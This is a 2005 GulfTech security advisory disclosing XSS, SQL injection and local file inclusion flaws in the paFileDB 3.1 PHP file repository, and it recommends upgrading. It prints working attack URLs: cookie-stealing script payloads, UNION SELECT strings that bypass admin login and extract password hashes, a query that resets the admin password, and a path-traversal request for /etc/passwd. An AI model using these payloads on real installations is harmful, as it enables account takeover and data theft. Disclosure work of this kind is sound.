paFiledb31vuln.txt

`##########################################################  
# GulfTech Security Research June 14th, 2005  
##########################################################  
# Vendor : php Arena  
# URL : http://www.phparena.net/pafiledb.php  
# Version : paFileDB 3.1 && Earlier  
# Risk : Multiple Vulnerabilities  
##########################################################  
  
  
  
Description:  
paFileDB is a popular open source web application offered by  
php Arena. paFileDB allows webmasters to open up an interactive  
file repository on their website. There are a number of  
vulnerabilities in paFileDB that may allow for an attacker to  
include arbitrary files, retrieve sensitive user and/or database  
information, and completely bypass admin, and team member  
authentication. Users should upgrade immediately.  
  
  
  
Cross Site Scripting:  
There are a number of cross site scripting issues in the paFileDB  
software. Majority of these cross site scripting issues stem from  
concatenated variables never being initialized.  
  
http://pafiledb/pafiledb.php?action=viewall&start=20&sortby=name%22  
%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E  
  
http://pafiledb/pafiledb.php?action=category&id=1&filelist=%22%3E%3C  
script%3Ealert%28document.cookie%29%3C%2Fscript%3E  
  
http://pafiledb/pafiledb.php?action=category&id=1&pages=%22%3E  
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E  
  
These vulnerabilities can be used to render hostile code in the  
context of the victims browser, and in turn disclose sensitive  
information to an attacker.  
  
  
  
SQL Injection:  
There are a number of SQL Injection vulnerabilities in paFileDB,  
but it should be noted that to exploit these issues magic quotes  
gpc must be off. Also, magic quotes off seems to be the default  
php.ini settings now so I do consider these issues fairly high  
risk. The most serious of the SQL Injection issues lies in the  
administrative login.  
  
if ($login == "do")  
{  
$admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin   
WHERE admin_username = '$formname'", 1);  
$formpw = md5($formpass);  
if ($formpw == $admin[admin_password])  
{  
$adminip = getenv ("REMOTE_ADDR");  
$ip = md5($adminip);  
$user = $formname;  
$pass = $formpw;  
  
if ($authmethod == "cookies")  
{  
$cookiedata = "$ip|$formname|$formpw";  
setcookie("pafiledbcookie", $cookiedata);  
}  
  
header("Location: admin.php");  
}  
  
  
The variable $formname is taken directly from the submitted login form  
and executed in the query, so if magic quotes gpc an attacker can  
use UNION SELECT to bypass admin authentication!  
  
http://pafiledb/pafiledb.php?action=admin&login=do&formname=-99'%20UNION  
%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9',  
%20admin_email,%201%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=  
%3E%3E+Log+In+%3C%3C&action=admin&login=do  
  
The query above uses a UNION SELECT to get the admin username, id, email etc  
but we specify the password hash as the md5 encrypted value of the $formpass  
variable. This same issue applies to the team login, and also the auth.php  
scripts in the /teams/ and /admin/ directory.  
  
There is also an SQL Injection vulnerability that will allow for team   
members to  
gain the administrative password hash and escalate their privileges to   
admin.  
  
http://pafiledb/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,  
admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+  
Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2F  
pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit  
  
http://pafiledb/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,  
admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%  
201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1  
=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit  
  
Last but not least there is a SQL Injection vulnerability in search.php  
because the $string variable is never sanitized.  
  
There is one SQL Injection issue in paFileDB that does not require magic_  
quotes_gpc to be disabled. This particular issue will let a team member  
run any sql command that they like, including making themselves an admin.  
  
http://pafiledb/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&  
query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20MD5%281337%28%  
20WHERE%201/*  
  
The above url would successfully set the admin password to 1337 if ran by  
a logged in team member or admin. This vulnerability exists because the  
$query variable is never declared before being concatenated so we can in  
turn hijack the $query variable and run any sql commands we like.  
  
  
  
Local File Include Vulnerability:  
paFileDB is vulnerable to a local file inclusion vulnerability that may  
allow for an attacker to execute arbitrary local scripts, or read/access  
arbitrary files on the webserver. Let's look at pafiledb.php  
  
if ($login == "do") { include "./includes/$action/login.php"; exit; }  
if ($ad == "logout") { include "./includes/admin/logout.php"; exit; }  
if ($tm == "logout") { include "./includes/team/logout.php"; exit; }  
  
The $action variable is never sanitized and vulnerable to directory  
traversal sequences.  
  
http://pafiledb/pafiledb.php?action=../../../../etc/passwd%00&login=do  
  
This vulnerability exists on all paFileDB configurations, as all GPC  
is extracted to global variables.  
  
  
  
Solution:  
A new version of paFileDB has been released, so upgrading is advised.  
  
  
  
Related Info:  
The original advisory can be found at the following location  
http://www.gulftech.org/?node=research&article_id=00082-06142005  
  
  
  
Credits:  
James Bercegay of the GulfTech Security Research Team  
  
`